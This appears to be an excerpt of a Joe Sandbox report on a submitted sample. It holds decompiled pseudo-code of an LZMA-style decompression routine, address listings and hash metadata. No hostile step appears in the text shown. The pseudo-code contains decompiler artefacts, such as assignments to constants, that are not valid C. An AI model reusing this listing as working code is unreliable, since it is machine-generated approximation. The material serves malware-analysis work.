                    							__ecx = _v116;
                    							__eax = _v16;
                    							_v20 = _v20 << 8;
                    							__ecx =  *_v116 & 0x000000ff;
                    							_v112 = _v112 - 1;
                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							_t490 =  &_v116;
                    							 *_t490 = _v116 + 1;
                    							__eflags =  *_t490;
                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                    							L151:
                    							_t493 =  &_v76;
                    							 *_t493 = _v76 - 1;
                    							__eflags =  *_t493;
                    							L152:
                    							__eflags = _v76;
                    							if(_v76 <= 0) {
                    								__ecx = _v68;
                    								__ebx = _v84;
                    								0 = 1;
                    								__eax = 1 << __cl;
                    								__ebx = _v84 - (1 << __cl);
                    								__eax = _v128;
                    								_v72 = __ebx;
                    								L143:
                    								_v140 = _t561;
                    								goto L3;
                    							}
                    							__eax = _v84;
                    							_v20 = _v20 >> 0xb;
                    							__edx = _v84 + _v84;
                    							__eax = _v92;
                    							__esi = __edx + __eax;
                    							_v88 = __esi;
                    							__ax =  *__esi;
                    							__edi = __ax & 0x0000ffff;
                    							__ecx = (_v20 >> 0xb) * __edi;
                    							__eflags = _v16 - __ecx;
                    							if(_v16 >= __ecx) {
                    								_v20 = _v20 - __ecx;
                    								_v16 = _v16 - __ecx;
                    								__cx = __ax;
                    								__cx = __ax >> 5;
                    								__eax = __eax - __ecx;
                    								__edx = __edx + 1;
                    								__eflags = __edx;
                    								 *__esi = __ax;
                    								_v84 = __edx;
                    							} else {
                    								_v20 = __ecx;
                    								0x800 = 0x800 - __edi;
                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    								_v84 = _v84 << 1;
                    								 *__esi = __cx;
                    							}
                    							__eflags = _v20 - 0x1000000;
                    							if(_v20 >= 0x1000000) {
                    								goto L151;
                    							} else {
                    								goto L149;
                    							}
                    						case 0x19:
                    							__eflags = __ebx - 4;
                    							if(__ebx < 4) {
                    								_v48 = __ebx;
                    								L122:
                    								_t399 =  &_v48;
                    								 *_t399 = _v48 + 1;
                    								__eflags =  *_t399;
                    								L123:
                    								__eax = _v48;
                    								__eflags = __eax;
                    								if(__eax == 0) {
                    									_v52 = _v52 | 0xffffffff;
                    									goto L173;
                    								}
                    								__eflags = __eax - _v100;
                    								if(__eax > _v100) {
                    									goto L174;
                    								}
                    								_v52 = _v52 + 2;
                    								__eax = _v52;
                    								_t406 =  &_v100;
                    								 *_t406 = _v100 + _v52;
                    								__eflags =  *_t406;
                    								goto L126;
                    							}
                    							__ecx = __ebx;
                    							__eax = __ebx;
                    							__ecx = __ebx >> 1;
                    							__eax = __ebx & 0x00000001;
                    							__ecx = (__ebx >> 1) - 1;
                    							__al = __al | 0x00000002;
                    							__eax = (__ebx & 0x00000001) << __cl;
                    							__eflags = __ebx - 0xe;
                    							_v48 = __eax;
                    							if(__ebx >= 0xe) {
                    								__ebx = 0;
                    								_v76 = __ecx;
                    								L105:
                    								__eflags = _v76;
                    								if(_v76 <= 0) {
                    									__eax = __eax + __ebx;
                    									_v68 = 4;
                    									_v48 = __eax;
                    									__eax = _v8;
                    									__eax = _v8 + 0x644;
                    									__eflags = __eax;
                    									L111:
                    									__ebx = 0;
                    									_v92 = __eax;
                    									_v84 = 1;
                    									_v72 = 0;
                    									_v76 = 0;
                    									L115:
                    									__eax = _v68;
                    									__eflags = _v76 - _v68;
                    									if(_v76 >= _v68) {
                    										_t397 =  &_v48;
                    										 *_t397 = _v48 + __ebx;
                    										__eflags =  *_t397;
                    										goto L122;
                    									}
                    									__eax = _v84;
                    									_v20 = _v20 >> 0xb;
                    									__edi = _v84 + _v84;
                    									__eax = _v92;
                    									__esi = __edi + __eax;
                    									_v88 = __esi;
                    									__ax =  *__esi;
                    									__ecx = __ax & 0x0000ffff;
                    									__edx = (_v20 >> 0xb) * __ecx;
                    									__eflags = _v16 - __edx;
                    									if(_v16 >= __edx) {
                    										__ecx = 0;
                    										_v20 = _v20 - __edx;
                    										__ecx = 1;
                    										_v16 = _v16 - __edx;
                    										__ebx = 1;
                    										__ecx = _v76;
                    										__ebx = 1 << __cl;
                    										__ecx = 1 << __cl;
                    										__ebx = _v72;
                    										__ebx = _v72 | __ecx;
                    										__cx = __ax;
                    										__cx = __ax >> 5;
                    										__eax = __eax - __ecx;
                    										__edi = __edi + 1;
                    										__eflags = __edi;
                    										_v72 = __ebx;
                    										 *__esi = __ax;
                    										_v84 = __edi;
                    									} else {
                    										_v20 = __edx;
                    										0x800 = 0x800 - __ecx;
                    										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                    										_v84 = _v84 << 1;
                    										 *__esi = __dx;
                    									}
                    									__eflags = _v20 - 0x1000000;
                    									if(_v20 >= 0x1000000) {
                    										L114:
                    										_t374 =  &_v76;
                    										 *_t374 = _v76 + 1;
                    										__eflags =  *_t374;
                    										goto L115;
                    									} else {
                    										goto L112;
                    									}
                    								}
                    								__ecx = _v16;
                    								__ebx = __ebx + __ebx;
                    								_v20 = _v20 >> 1;
                    								__eflags = _v16 - _v20;
                    								_v72 = __ebx;
                    								if(_v16 >= _v20) {
                    									__ecx = _v20;
                    									_v16 = _v16 - _v20;
                    									__ebx = __ebx | 0x00000001;
                    									__eflags = __ebx;
                    									_v72 = __ebx;
                    								}
                    								__eflags = _v20 - 0x1000000;
                    								if(_v20 >= 0x1000000) {
                    									L104:
                    									_t344 =  &_v76;
                    									 *_t344 = _v76 - 1;
                    									__eflags =  *_t344;
                    									goto L105;
                    								} else {
                    									goto L102;
                    								}
                    							}
                    							__edx = _v8;
                    							__eax = __eax - __ebx;
                    							_v68 = __ecx;
                    							__eax = _v8 + 0x55e + __eax * 2;
                    							goto L111;
                    						case 0x1a:
                    							L58:
                    							__eflags = _v104;
                    							if(_v104 == 0) {
                    								_v140 = 0x1a;
                    								goto L173;
                    							}
                    							__ecx = _v108;
                    							__al = _v96;
                    							__edx = _v12;
                    							_v100 = _v100 + 1;
                    							_v108 = _v108 + 1;
                    							_v104 = _v104 - 1;
                    							 *_v108 = __al;
                    							__ecx = _v24;
                    							 *(_v12 + __ecx) = __al;
                    							__eax = __ecx + 1;
                    							__edx = 0;
                    							_t197 = __eax % _v120;
                    							__eax = __eax / _v120;
                    							__edx = _t197;
                    							goto L82;
                    						case 0x1b:
                    							L78:
                    							__eflags = _v104;
                    							if(_v104 == 0) {
                    								_v140 = 0x1b;
                    								goto L173;
                    							}
                    							__eax = _v24;
                    							__eax = _v24 - _v48;
                    							__eflags = __eax - _v120;
                    							if(__eax >= _v120) {
                    								__eax = __eax + _v120;
                    								__eflags = __eax;
                    							}
                    							__edx = _v12;
                    							__cl =  *(__edx + __eax);
                    							__eax = _v24;
                    							_v96 = __cl;
                    							 *(__edx + __eax) = __cl;
                    							__eax = __eax + 1;
                    							__edx = 0;
                    							_t280 = __eax % _v120;
                    							__eax = __eax / _v120;
                    							__edx = _t280;
                    							__eax = _v108;
                    							_v100 = _v100 + 1;
                    							_v108 = _v108 + 1;
                    							_t289 =  &_v104;
                    							 *_t289 = _v104 - 1;
                    							__eflags =  *_t289;
                    							 *_v108 = __cl;
                    							L82:
                    							_v24 = __edx;
                    							goto L83;
                    						case 0x1c:
                    							while(1) {
                    								L126:
                    								__eflags = _v104;
                    								if(_v104 == 0) {
                    									break;
                    								}
                    								__eax = _v24;
                    								__eax = _v24 - _v48;
                    								__eflags = __eax - _v120;
                    								if(__eax >= _v120) {
                    									__eax = __eax + _v120;
                    									__eflags = __eax;
                    								}
                    								__edx = _v12;
                    								__cl =  *(__edx + __eax);
                    								__eax = _v24;
                    								_v96 = __cl;
                    								 *(__edx + __eax) = __cl;
                    								__eax = __eax + 1;
                    								__edx = 0;
                    								_t420 = __eax % _v120;
                    								__eax = __eax / _v120;
                    								__edx = _t420;
                    								__eax = _v108;
                    								_v108 = _v108 + 1;
                    								_v104 = _v104 - 1;
                    								_v52 = _v52 - 1;
                    								__eflags = _v52;
                    								 *_v108 = __cl;
                    								_v24 = _t420;
                    								if(_v52 > 0) {
                    									continue;
                    								} else {
                    									L83:
                    									_v140 = 2;
                    									goto L3;
                    								}
                    							}
                    							_v140 = 0x1c;
                    							L173:
                    							_push(0x22);
                    							_pop(_t574);
                    							memcpy(_v148,  &_v140, _t574 << 2);
                    							return 0;
                    					}
                    				}
                    				L174:
                    				_t538 = _t537 | 0xffffffff;
                    				return _t538;
                    			}
                    0x004075b1
                    0x00000000
                    0x004075b1
                    0x00407290
                    0x00407293
                    0x00407296
                    0x0040729a
                    0x0040729d
                    0x004072a3
                    0x004072a5
                    0x004072a5
                    0x004072a5
                    0x004072a8
                    0x00000000
                    0x00000000
                    0x00407056
                    0x00407056
                    0x00407059
                    0x00000000
                    0x00000000
                    0x00407395
                    0x00407399
                    0x004073bb
                    0x004073be
                    0x004073c8
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x0040739b
                    0x0040739e
                    0x004073a2
                    0x004073a5
                    0x004073a5
                    0x004073a8
                    0x00000000
                    0x00000000
                    0x00407452
                    0x00407456
                    0x00407474
                    0x00407474
                    0x00407474
                    0x0040747b
                    0x00407482
                    0x00407489
                    0x00407489
                    0x00000000
                    0x00407489
                    0x00407458
                    0x0040745b
                    0x0040745e
                    0x00407461
                    0x00407468
                    0x004073ac
                    0x004073ac
                    0x004073af
                    0x00000000
                    0x00000000
                    0x00407543
                    0x00407546
                    0x00000000
                    0x00000000
                    0x0040717d
                    0x0040717f
                    0x00407186
                    0x00407187
                    0x00407189
                    0x0040718c
                    0x00000000
                    0x00000000
                    0x00407194
                    0x00407197
                    0x0040719a
                    0x0040719c
                    0x0040719e
                    0x0040719e
                    0x0040719f
                    0x004071a2
                    0x004071a9
                    0x004071ac
                    0x004071ba
                    0x00000000
                    0x00000000
                    0x00407490
                    0x00407490
                    0x00407493
                    0x0040749a
                    0x00000000
                    0x00000000
                    0x0040749f
                    0x0040749f
                    0x004074a3
                    0x004075db
                    0x00000000
                    0x004075db
                    0x004074a9
                    0x004074ac
                    0x004074af
                    0x004074b3
                    0x004074b6
                    0x004074bc
                    0x004074be
                    0x004074be
                    0x004074be
                    0x004074c1
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c7
                    0x004074c7
                    0x004074cb
                    0x0040752b
                    0x0040752e
                    0x00407533
                    0x00407534
                    0x00407536
                    0x00407538
                    0x0040753b
                    0x00407447
                    0x00407447
                    0x00000000
                    0x00407447
                    0x004074cd
                    0x004074d3
                    0x004074d6
                    0x004074d9
                    0x004074dc
                    0x004074df
                    0x004074e2
                    0x004074e5
                    0x004074e8
                    0x004074eb
                    0x004074ee
                    0x00407507
                    0x0040750a
                    0x0040750d
                    0x00407510
                    0x00407514
                    0x00407516
                    0x00407516
                    0x00407517
                    0x0040751a
                    0x004074f0
                    0x004074f0
                    0x004074f8
                    0x004074fd
                    0x004074ff
                    0x00407502
                    0x00407502
                    0x0040751d
                    0x00407524
                    0x00000000
                    0x00407526
                    0x00000000
                    0x00407526
                    0x00000000
                    0x004071c2
                    0x004071c5
                    0x004071fb
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732e
                    0x0040732e
                    0x00407331
                    0x00407333
                    0x004075bd
                    0x00000000
                    0x004075bd
                    0x00407339
                    0x0040733c
                    0x00000000
                    0x00000000
                    0x00407342
                    0x00407346
                    0x00407349
                    0x00407349
                    0x00407349
                    0x00000000
                    0x00407349
                    0x004071c7
                    0x004071c9
                    0x004071cb
                    0x004071cd
                    0x004071d0
                    0x004071d1
                    0x004071d3
                    0x004071d5
                    0x004071d8
                    0x004071db
                    0x004071f1
                    0x004071f6
                    0x0040722e
                    0x0040722e
                    0x00407232
                    0x0040725e
                    0x00407260
                    0x00407267
                    0x0040726a
                    0x0040726d
                    0x0040726d
                    0x00407272
                    0x00407272
                    0x00407274
                    0x00407277
                    0x0040727e
                    0x00407281
                    0x004072ae
                    0x004072ae
                    0x004072b1
                    0x004072b4
                    0x00407328
                    0x00407328
                    0x00407328
                    0x00000000
                    0x00407328
                    0x004072b6
                    0x004072bc
                    0x004072bf
                    0x004072c2
                    0x004072c5
                    0x004072c8
                    0x004072cb
                    0x004072ce
                    0x004072d1
                    0x004072d4
                    0x004072d7
                    0x004072f0
                    0x004072f2
                    0x004072f5
                    0x004072f6
                    0x004072f9
                    0x004072fb
                    0x004072fe
                    0x00407300
                    0x00407302
                    0x00407305
                    0x00407307
                    0x0040730a
                    0x0040730e
                    0x00407310
                    0x00407310
                    0x00407311
                    0x00407314
                    0x00407317
                    0x004072d9
                    0x004072d9
                    0x004072e1
                    0x004072e6
                    0x004072e8
                    0x004072eb
                    0x004072eb
                    0x0040731a
                    0x00407321
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x00000000
                    0x00407323
                    0x00000000
                    0x00407323
                    0x00407321
                    0x00407234
                    0x00407237
                    0x00407239
                    0x0040723c
                    0x0040723f
                    0x00407242
                    0x00407244
                    0x00407247
                    0x0040724a
                    0x0040724a
                    0x0040724d
                    0x0040724d
                    0x00407250
                    0x00407257
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x00000000
                    0x00407259
                    0x00000000
                    0x00407259
                    0x00407257
                    0x004071dd
                    0x004071e0
                    0x004071e2
                    0x004071e5
                    0x00000000
                    0x00000000
                    0x00406f44
                    0x00406f44
                    0x00406f48
                    0x0040758d
                    0x00000000
                    0x0040758d
                    0x00406f4e
                    0x00406f51
                    0x00406f54
                    0x00406f57
                    0x00406f5a
                    0x00406f5d
                    0x00406f60
                    0x00406f62
                    0x00406f65
                    0x00406f68
                    0x00406f6b
                    0x00406f6d
                    0x00406f6d
                    0x00406f6d
                    0x00000000
                    0x00000000
                    0x004070cf
                    0x004070cf
                    0x004070d3
                    0x00407599
                    0x00000000
                    0x00407599
                    0x004070d9
                    0x004070dc
                    0x004070df
                    0x004070e2
                    0x004070e4
                    0x004070e4
                    0x004070e4
                    0x004070e7
                    0x004070ea
                    0x004070ed
                    0x004070f0
                    0x004070f3
                    0x004070f6
                    0x004070f7
                    0x004070f9
                    0x004070f9
                    0x004070f9
                    0x004070fc
                    0x004070ff
                    0x00407102
                    0x00407105
                    0x00407105
                    0x00407105
                    0x00407108
                    0x0040710a
                    0x0040710a
                    0x00000000
                    0x00000000
                    0x0040734c
                    0x0040734c
                    0x0040734c
                    0x00407350
                    0x00000000
                    0x00000000
                    0x00407356
                    0x00407359
                    0x0040735c
                    0x0040735f
                    0x00407361
                    0x00407361
                    0x00407361
                    0x00407364
                    0x00407367
                    0x0040736a
                    0x0040736d
                    0x00407370
                    0x00407373
                    0x00407374
                    0x00407376
                    0x00407376
                    0x00407376
                    0x00407379
                    0x0040737c
                    0x0040737f
                    0x00407382
                    0x00407385
                    0x00407389
                    0x0040738b
                    0x0040738e
                    0x00000000
                    0x00407390
                    0x0040710d
                    0x0040710d
                    0x00000000
                    0x0040710d
                    0x0040738e
                    0x004075c3
                    0x004075e5
                    0x004075eb
                    0x004075ed
                    0x004075f4
                    0x00000000
                    0x00000000
                    0x00406bf2
                    0x004075fa
                    0x004075fa
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                    • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                    • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                    • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E00406FFE() {
                    				signed int _t539;
                    				unsigned short _t540;
                    				signed int _t541;
                    				void _t542;
                    				signed int _t543;
                    				signed int _t544;
                    				signed int _t573;
                    				signed int _t576;
                    				signed int _t597;
                    				signed int* _t614;
                    				void* _t621;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					if( *(_t621 - 0x40) != 1) {
                    						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                    						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                    						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                    						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                    						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                    						_t539 =  *(_t621 - 4) + 0x664;
                    						 *(_t621 - 0x58) = _t539;
                    						goto L68;
                    					} else {
                    						 *(__ebp - 0x84) = 8;
                    						while(1) {
                    							L132:
                    							 *(_t621 - 0x54) = _t614;
                    							while(1) {
                    								L133:
                    								_t540 =  *_t614;
                    								_t597 = _t540 & 0x0000ffff;
                    								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                    								if( *(_t621 - 0xc) >= _t573) {
                    									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                    									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                    									 *(_t621 - 0x40) = 1;
                    									_t541 = _t540 - (_t540 >> 5);
                    									 *_t614 = _t541;
                    								} else {
                    									 *(_t621 - 0x10) = _t573;
                    									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                    									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                    								}
                    								if( *(_t621 - 0x10) >= 0x1000000) {
                    									goto L139;
                    								}
                    								L137:
                    								if( *(_t621 - 0x6c) == 0) {
                    									 *(_t621 - 0x88) = 5;
                    									L170:
                    									_t576 = 0x22;
                    									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                    									_t544 = 0;
                    									L172:
                    									return _t544;
                    								}
                    								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                    								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                    								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                    								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                    								L139:
                    								_t542 =  *(_t621 - 0x84);
                    								while(1) {
                    									 *(_t621 - 0x88) = _t542;
                    									while(1) {
                    										L1:
                    										_t543 =  *(_t621 - 0x88);
                    										if(_t543 > 0x1c) {
                    											break;
                    										}
                    										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                    											case 0:
                    												if( *(_t621 - 0x6c) == 0) {
                    													goto L170;
                    												}
                    												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                    												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                    												_t543 =  *( *(_t621 - 0x70));
                    												if(_t543 > 0xe1) {
                    													goto L171;
                    												}
                    												_t547 = _t543 & 0x000000ff;
                    												_push(0x2d);
                    												asm("cdq");
                    												_pop(_t578);
                    												_push(9);
                    												_pop(_t579);
                    												_t617 = _t547 / _t578;
                    												_t549 = _t547 % _t578 & 0x000000ff;
                    												asm("cdq");
                    												_t612 = _t549 % _t579 & 0x000000ff;
                    												 *(_t621 - 0x3c) = _t612;
                    												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                    												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                    												_t620 = (0x300 << _t612 + _t617) + 0x736;
                    												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                    													L10:
                    													if(_t620 == 0) {
                    														L12:
                    														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                    														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                    														goto L15;
                    													} else {
                    														goto L11;
                    													}
                    													do {
                    														L11:
                    														_t620 = _t620 - 1;
                    														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                    													} while (_t620 != 0);
                    													goto L12;
                    												}
                    												if( *(_t621 - 4) != 0) {
                    													GlobalFree( *(_t621 - 4));
                    												}
                    												_t543 = GlobalAlloc(0x40, 0x600); // executed
                    												 *(_t621 - 4) = _t543;
                    												if(_t543 == 0) {
                    													goto L171;
                    												} else {
                    													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                    													goto L10;
                    												}
                    											case 1:
                    												L13:
                    												__eflags =  *(_t621 - 0x6c);
                    												if( *(_t621 - 0x6c) == 0) {
                    													 *(_t621 - 0x88) = 1;
                    													goto L170;
                    												}
                    												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                    												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                    												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                    												_t45 = _t621 - 0x48;
                    												 *_t45 =  *(_t621 - 0x48) + 1;
                    												__eflags =  *_t45;
                    												L15:
                    												if( *(_t621 - 0x48) < 4) {
                    													goto L13;
                    												}
                    												_t555 =  *(_t621 - 0x40);
                    												if(_t555 ==  *(_t621 - 0x74)) {
                    													L20:
                    													 *(_t621 - 0x48) = 5;
                    													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                    													goto L23;
                    												}
                    												 *(_t621 - 0x74) = _t555;
                    												if( *(_t621 - 8) != 0) {
                    													GlobalFree( *(_t621 - 8));
                    												}
                    												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                    												 *(_t621 - 8) = _t543;
                    												if(_t543 == 0) {
                    													goto L171;
                    												} else {
                    													goto L20;
                    												}
                    											case 2:
                    												L24:
                    												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                    												 *(_t621 - 0x84) = 6;
                    												 *(_t621 - 0x4c) = _t562;
                    												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                    												goto L132;
                    											case 3:
                    												L21:
                    												__eflags =  *(_t621 - 0x6c);
                    												if( *(_t621 - 0x6c) == 0) {
                    													 *(_t621 - 0x88) = 3;
                    													goto L170;
                    												}
                    												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                    												_t67 = _t621 - 0x70;
                    												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                    												__eflags =  *_t67;
                    												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                    												L23:
                    												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                    												if( *(_t621 - 0x48) != 0) {
                    													goto L21;
                    												}
                    												goto L24;
                    											case 4:
                    												L133:
                    												_t540 =  *_t614;
                    												_t597 = _t540 & 0x0000ffff;
                    												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                    												if( *(_t621 - 0xc) >= _t573) {
                    													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                    													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                    													 *(_t621 - 0x40) = 1;
                    													_t541 = _t540 - (_t540 >> 5);
                    													 *_t614 = _t541;
                    												} else {
                    													 *(_t621 - 0x10) = _t573;
                    													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                    													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                    												}
                    												if( *(_t621 - 0x10) >= 0x1000000) {
                    													goto L139;
                    												}
                    											case 5:
                    												goto L137;
                    											case 6:
                    												__edx = 0;
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__eax =  *(__ebp - 4);
                    													__ecx =  *(__ebp - 0x38);
                    													 *(__ebp - 0x34) = 1;
                    													 *(__ebp - 0x84) = 7;
                    													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                    													L132:
                    													 *(_t621 - 0x54) = _t614;
                    													goto L133;
                    												}
                    												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                    												__esi =  *(__ebp - 0x60);
                    												__cl = 8;
                    												__cl = 8 -  *(__ebp - 0x3c);
                    												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                    												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                    												__ecx =  *(__ebp - 0x3c);
                    												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                    												__ecx =  *(__ebp - 4);
                    												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                    												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                    												__eflags =  *(__ebp - 0x38) - 4;
                    												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    												if( *(__ebp - 0x38) >= 4) {
                    													__eflags =  *(__ebp - 0x38) - 0xa;
                    													if( *(__ebp - 0x38) >= 0xa) {
                    														_t98 = __ebp - 0x38;
                    														 *_t98 =  *(__ebp - 0x38) - 6;
                    														__eflags =  *_t98;
                    													} else {
                    														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                    													}
                    												} else {
                    													 *(__ebp - 0x38) = 0;
                    												}
                    												__eflags =  *(__ebp - 0x34) - __edx;
                    												if( *(__ebp - 0x34) == __edx) {
                    													__ebx = 0;
                    													__ebx = 1;
                    													goto L61;
                    												} else {
                    													__eax =  *(__ebp - 0x14);
                    													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    													__eflags = __eax -  *(__ebp - 0x74);
                    													if(__eax >=  *(__ebp - 0x74)) {
                    														__eax = __eax +  *(__ebp - 0x74);
                    														__eflags = __eax;
                    													}
                    													__ecx =  *(__ebp - 8);
                    													__ebx = 0;
                    													__ebx = 1;
                    													__al =  *((intOrPtr*)(__eax + __ecx));
                    													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                    													goto L41;
                    												}
                    											case 7:
                    												goto L0;
                    											case 8:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__eax =  *(__ebp - 4);
                    													__ecx =  *(__ebp - 0x38);
                    													 *(__ebp - 0x84) = 0xa;
                    													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                    												} else {
                    													__eax =  *(__ebp - 0x38);
                    													__ecx =  *(__ebp - 4);
                    													__eax =  *(__ebp - 0x38) + 0xf;
                    													 *(__ebp - 0x84) = 9;
                    													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                    													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                    												}
                    												while(1) {
                    													L132:
                    													 *(_t621 - 0x54) = _t614;
                    													goto L133;
                    												}
                    											case 9:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													goto L89;
                    												}
                    												__eflags =  *(__ebp - 0x60);
                    												if( *(__ebp - 0x60) == 0) {
                    													goto L171;
                    												}
                    												__eax = 0;
                    												__eflags =  *(__ebp - 0x38) - 7;
                    												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                    												__eflags = _t258;
                    												0 | _t258 = _t258 + _t258 + 9;
                    												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                    												goto L75;
